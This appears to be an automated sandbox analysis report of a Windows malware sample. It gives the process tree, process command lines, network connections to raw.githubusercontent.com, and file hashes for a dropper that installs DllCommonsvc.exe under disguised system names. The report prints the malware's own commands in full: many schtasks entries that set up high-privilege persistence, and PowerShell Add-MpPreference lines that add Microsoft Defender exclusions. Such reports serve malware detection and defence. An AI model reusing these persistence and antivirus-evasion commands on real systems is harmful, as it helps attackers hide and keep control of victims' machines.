PID 3104 wrote to memory of 2772 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3640 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3640 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3448 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 3448 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5108 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 5108 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4200 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4200 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4144 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4144 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4204 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 4204 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3104 wrote to memory of 376 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 3104 wrote to memory of 376 N/A C:\providercommon\DllCommonsvc.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 376 wrote to memory of 5440 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 376 wrote to memory of 5440 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 5440 wrote to memory of 5668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5440 wrote to memory of 5668 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5440 wrote to memory of 6132 N/A C:\Windows\System32\cmd.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5440 wrote to memory of 6132 N/A C:\Windows\System32\cmd.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 6132 wrote to memory of 5148 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 6132 wrote to memory of 5148 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 5148 wrote to memory of 5204 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5148 wrote to memory of 5204 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5148 wrote to memory of 5220 N/A C:\Windows\System32\cmd.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5148 wrote to memory of 5220 N/A C:\Windows\System32\cmd.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5220 wrote to memory of 5344 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 5220 wrote to memory of 5344 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 5344 wrote to memory of 5448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5344 wrote to memory of 5448 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5344 wrote to memory of 5460 N/A C:\Windows\System32\cmd.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5344 wrote to memory of 5460 N/A C:\Windows\System32\cmd.exe C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe
PID 5460 wrote to memory of 5284 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe
PID 5460 wrote to memory of 5284 N/A C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe C:\Windows\System32\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe

"C:\Users\Admin\AppData\Local\Temp\d31966ae28befdd549a122e3a8c087a3cfc5e4fcecbb95a58ba36190ac258d9a.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "

C:\providercommon\DllCommonsvc.exe

"C:\providercommon\DllCommonsvc.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\sihost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\odt\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\odt\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Windows\twain_32\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\twain_32\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Uninstall Information\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\System.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\System.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\providercommon\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\providercommon\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Media Player\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\odt\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Desktop\DllCommonsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Users\All Users\Desktop\DllCommonsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 12 /tr "'C:\Users\All Users\Desktop\DllCommonsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Portable Devices\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sihost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\appcompat\appraiser\Telemetry\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\spoolsv.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\dllhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\csrss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\winlogon.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Desktop\DllCommonsvc.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\fontdrvhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\explorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\spoolsv.exe'

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5Ad8adCyX4.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wRWwqJyPGw.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Urxb3wPgb0.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RBOUzXbIOW.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\FEON83D8AI.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\V3SaMhi525.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\yWf31kVUUl.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0Sh6ipYOoX.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mQXsfud8LV.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\fmZn61weJC.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MzhLoGhvPq.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Network

Country Destination Domain Proto
FR 2.16.119.157:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 20.42.65.84:443 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 209.197.3.8:80 tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp

Files

memory/1460-120-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-121-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-122-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-123-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-125-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-126-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-128-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-129-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-130-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-131-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-132-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-133-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-134-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-135-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-136-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-137-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-138-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-139-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-140-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-141-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-142-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-143-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-144-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-145-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-146-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-147-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-148-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-149-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-150-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-151-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-152-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-153-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-154-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-155-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-156-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-157-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-158-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-159-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-160-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-161-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-162-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-163-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-164-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-165-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-166-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-167-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-168-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-169-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-171-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-170-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-172-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-173-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-174-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-175-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-176-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-177-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-178-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-179-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-180-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-181-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-182-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/1460-183-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/4512-184-0x0000000000000000-mapping.dmp

memory/4512-185-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

memory/4512-186-0x0000000077AA0000-0x0000000077C2E000-memory.dmp

C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe

MD5 8088241160261560a02c84025d107592
SHA1 083121f7027557570994c9fc211df61730455bb5
SHA256 2072cc9a4a3b84d4c5178ab41c5588eea7d0103e3928e34d64f17bf97f3d1cc1
SHA512 20d9369dd359315848ea30144383a0bb479d86059fdbc3b3256ac84f998193512feb3b1799ab663619920c99fe7e0ebba33ada31a3855094b956fcd351c90478

C:\providercommon\1zu9dW.bat

MD5 6783c3ee07c7d151ceac57f1f9c8bed7
SHA1 17468f98f95bf504cc1f83c49e49a78526b3ea03
SHA256 8ab782f0f327a2021530e7230d3aee8abbecb7eed59482a3a46e78b9e3862322
SHA512 c6012d4bfac1ed14d0fd9f0eabd0e1c3d647b343db292a907b246271d52a4b7469c809db43910ddba2e8c5045f9cb3d24d0af62d363281e6cb8b39ee94a183e8

memory/4736-260-0x0000000000000000-mapping.dmp

memory/3104-283-0x0000000000000000-mapping.dmp

C:\providercommon\DllCommonsvc.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

C:\providercommon\DllCommonsvc.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

memory/3104-286-0x00000000008D0000-0x00000000009E0000-memory.dmp

memory/3104-287-0x0000000002B30000-0x0000000002B42000-memory.dmp

memory/3104-288-0x0000000002B40000-0x0000000002B4C000-memory.dmp

memory/3104-289-0x0000000002B50000-0x0000000002B5C000-memory.dmp

memory/3104-290-0x0000000002B60000-0x0000000002B6C000-memory.dmp

memory/2248-291-0x0000000000000000-mapping.dmp

memory/2548-293-0x0000000000000000-mapping.dmp

memory/2472-292-0x0000000000000000-mapping.dmp

memory/4796-294-0x0000000000000000-mapping.dmp

memory/3912-295-0x0000000000000000-mapping.dmp

memory/4052-297-0x0000000000000000-mapping.dmp

memory/5112-296-0x0000000000000000-mapping.dmp

memory/4440-298-0x0000000000000000-mapping.dmp

memory/3624-302-0x0000000000000000-mapping.dmp

memory/3420-300-0x0000000000000000-mapping.dmp

memory/2772-305-0x0000000000000000-mapping.dmp

memory/3448-312-0x0000000000000000-mapping.dmp

memory/3640-308-0x0000000000000000-mapping.dmp

memory/4204-330-0x0000000000000000-mapping.dmp

memory/4144-325-0x0000000000000000-mapping.dmp

memory/4200-321-0x0000000000000000-mapping.dmp

memory/5108-318-0x0000000000000000-mapping.dmp

memory/376-350-0x0000000000000000-mapping.dmp

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
SHA256 b5199d3eb28e7de8ec4a5de66cb339a03d90b297e2292473badaab98ade15c63
SHA512 f96658bd19b672fd84038bd7e95c89e14f4e6f84e3ce9c6fe3216861a41203406148c6a809c2ab350d0d6c5919c845f619deb1fc9b1f1814dfce87e566bc2394

C:\Windows\BitLockerDiscoveryVolumeContents\cmd.exe

MD5 bd31e94b4143c4ce49c17d3af46bcad0
SHA1 f8c51ff3ff909531d9469d4ba1bbabae101853ff
